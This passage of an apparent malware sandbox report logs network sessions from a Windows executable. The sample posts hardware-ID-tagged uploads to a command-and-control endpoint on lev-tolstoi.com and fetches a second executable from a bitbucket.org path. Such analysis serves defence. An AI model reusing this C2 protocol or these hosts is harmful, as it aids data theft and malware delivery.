Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 07:40:44 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:40:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=aq5k6ch7vhpv0989muk4j80qsq; expires=Fri, 18 Apr 2025 01:27:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MMVSlJAIq%2B7JRLOpEPhRhGNTDAw66ra3FLPSpLU9D4pnbmud%2BbVDza5YU35up80CPy5AzLarW2vJmCNVE1fl9TIHAt12isfsCqPPZwfH33%2FH%2FaPbGPM2%2FmUDHRajXeF2aE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66b4825a2f423e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2110&min_rtt=2110&rtt_var=791&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1383230&cwnd=197&unsent_bytes=0&cid=363e269f5ca74aa9&ts=1065&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49727 | 104.21.66.86 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:40:45 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=HHOEN70NK
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 12799
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 07:40:45 UTC | 12799 | OUT | Data Ascii:
--HHOEN70NK
Content-Disposition: form-data; name="hwid"

62670E43FED93598AC8923850305D13E
--HHOEN70NK
Content-Disposition: form-data; name="pid"

2
--HHOEN70NK
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--HHOEN70NK
Conten
2024-12-23 07:40:46 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=aaunb6ke4ii8gtlk4233ivesh3; expires=Fri, 18 Apr 2025 01:27:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfFMrcuQVjfkCY7pi9aOscgxy%2BWrOISX%2FwdaXKglj4Q1UM%2FwYCoTJYtkhKzzmmNhz9ifugE92Z2Sf9JwPKXqkCObEoSZrzn5zg8P2qQz%2Bzq10w3mSdQntIBNDf%2FHYYt59a4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b49238174271-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1569&rtt_var=592&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13729&delivery_rate=1841109&cwnd=252&unsent_bytes=0&cid=83aee3999fbb37a2&ts=1099&x=0"
2024-12-23 07:40:46 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:40:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.11 | 49733 | 104.21.66.86 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:40:48 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=G0ZRODU1MVEYOK
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 15041
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 07:40:48 UTC | 15041 | OUT | Data Ascii:
--G0ZRODU1MVEYOK
Content-Disposition: form-data; name="hwid"

62670E43FED93598AC8923850305D13E
--G0ZRODU1MVEYOK
Content-Disposition: form-data; name="pid"

2
--G0ZRODU1MVEYOK
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--G0
2024-12-23 07:40:48 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=k2op0nsvm5u8uv1n891b8r0bpg; expires=Fri, 18 Apr 2025 01:27:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dE3EfaGumgUqBHaCfPWrNW%2Bq1sRm%2BxQXwC1pbfdtcS2s8JfiiODjJI%2BW%2BIjD%2F02Ew3rpitlBCLWJbWL1wmdYqSNn9RpHvo3NpDhqXleyI%2F9lH%2BJHbchbtwzXxWO78GTUlYc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4a1b974435d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1545&rtt_var=594&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15976&delivery_rate=1820448&cwnd=128&unsent_bytes=0&cid=65ca308e1c570e18&ts=881&x=0"
2024-12-23 07:40:48 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:40:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.11 | 49739 | 104.21.66.86 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:40:50 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=VSKU0NU9BAG1J2
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 20410
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 07:40:50 UTC15331OUTData Raw: 2d 2d 56 53 4b 55 30 4e 55 39 42 41 47 31 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 53 4b 55 30 4e 55 39 42 41 47 31 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 53 4b 55 30 4e 55 39 42 41 47 31 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 56 53
                                                                                                                                                                                                                                                                        Data Ascii: --VSKU0NU9BAG1J2Content-Disposition: form-data; name="hwid"62670E43FED93598AC8923850305D13E--VSKU0NU9BAG1J2Content-Disposition: form-data; name="pid"3--VSKU0NU9BAG1J2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--VS
                                                                                                                                                                                                                                                                        2024-12-23 07:40:50 UTC5079OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 fd 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d ae 2f 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 f5 47 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 be 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 d7 1f 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 fa a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: lrQM/64G6(X&~`aO
2024-12-23 07:40:51 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=djovtsfvln2qnk37mh6flfhc4o; expires=Fri, 18 Apr 2025 01:27:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZCfZoHsiesuHDIsGQsIFS0bxuuO4On6cbJylrchRNzsCMDcSafbob6NBmdsaMYjt57n%2Bee9LfSuOdGLu27SWKvtu%2BOEV%2BaeWJZRBm5BjaRf5d6o3R64oaNFNGFCSMCSNgQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4b0f8960f36-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=18288&min_rtt=1519&rtt_var=10617&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21367&delivery_rate=1922317&cwnd=228&unsent_bytes=0&cid=e0c12172f64da02d&ts=973&x=0"
2024-12-23 07:40:51 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:40:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.11 | 49748 | 104.21.66.86 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:40:53 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=FFVY7DHX236
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 1209
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 07:40:53 UTC1209OUTData Raw: 2d 2d 46 46 56 59 37 44 48 58 32 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 46 56 59 37 44 48 58 32 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 46 56 59 37 44 48 58 32 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 46 46 56 59 37 44 48 58 32 33 36
                                                                                                                                                                                                                                                                        Data Ascii: --FFVY7DHX236Content-Disposition: form-data; name="hwid"62670E43FED93598AC8923850305D13E--FFVY7DHX236Content-Disposition: form-data; name="pid"1--FFVY7DHX236Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--FFVY7DHX236
2024-12-23 07:40:53 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=pa1o3i26hs9fs8ek8hmculsigl; expires=Fri, 18 Apr 2025 01:27:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1hbWPDBQKlwY0TmU6VVnHu6Mbjsyceu%2BIlla1w6b8x3y9hfm5zUxcXlLr51oEeYhhOENC3pTGO5pW8ldV3E3nQ%2Fw8pfS9LP9dTNqNgCYnzjd8xamfcWFhCMkASFQAQNcdg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4c0cc9cc34d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1458&rtt_var=560&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2118&delivery_rate=1929940&cwnd=252&unsent_bytes=0&cid=2d01f909b6134687&ts=641&x=0"
2024-12-23 07:40:53 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:40:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.11 | 49755 | 104.21.66.86 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:40:55 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=2LZ5UATFIAIX09
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 588109
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 07:40:55 UTC | 15331 | OUT | Data Raw: 2d 2d 32 4c 5a 35 55 41 54 46 49 41 49 58 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 4c 5a 35 55 41 54 46 49 41 49 58 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4c 5a 35 55 41 54 46 49 41 49 58 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 32 4c
                                                                                                                                                                                                                                                                        Data Ascii: --2LZ5UATFIAIX09Content-Disposition: form-data; name="hwid"62670E43FED93598AC8923850305D13E--2LZ5UATFIAIX09Content-Disposition: form-data; name="pid"1--2LZ5UATFIAIX09Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--2L
2024-12-23 07:40:59 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=ib2eosupr4aiq8thi2m2gup2rj; expires=Fri, 18 Apr 2025 01:27:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2J%2F4%2BQgXEEpzqTzwDTtvtv2zJtgupMaTU7d6GyLnnbamZMdlPfHIlChA4%2BAGLDQt92C7q9OuHMnWOs9rjD7zfKQSf3Ide9NolYoBQz7FEivjPMhZNCi2Q3wxr82QQGTb3Hg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4d09dfd4333-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2076&min_rtt=2048&rtt_var=825&sent=334&recv=608&lost=0&retrans=0&sent_bytes=2836&recv_bytes=590695&delivery_rate=1282389&cwnd=248&unsent_bytes=0&cid=2b34990056cac56a&ts=3993&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.11 | 49767 | 104.21.66.86 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:41:00 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 88
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 07:41:00 UTC | 88 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 36 32 36 37 30 45 34 33 46 45 44 39 33 35 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=62670E43FED93598AC8923850305D13E
2024-12-23 07:41:01 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:41:01 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=bcepefe05ands14rdbl50l40u8; expires=Fri, 18 Apr 2025 01:27:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EN5A8Qf80p9gEGeAi%2BP2gwlKkya6MIVdxPTO9cnL8Ir3l83H6fRcjtlh9VCzhS17E8s5efG5w%2FtFUZ6r1SVCNz%2BGa5goST6gVeuTX0YYJkphWdTst4CqTqLmEZUFZA2Tv8g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4f20cc94235-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1570&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1812538&cwnd=248&unsent_bytes=0&cid=a556981212f5d543&ts=758&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.11 | 49772 | 185.166.143.49 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:41:03 UTC | 248 | OUT | GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: bitbucket.org
2024-12-23 07:41:03 UTC | 5956 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:41:03 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: AtlassianEdge
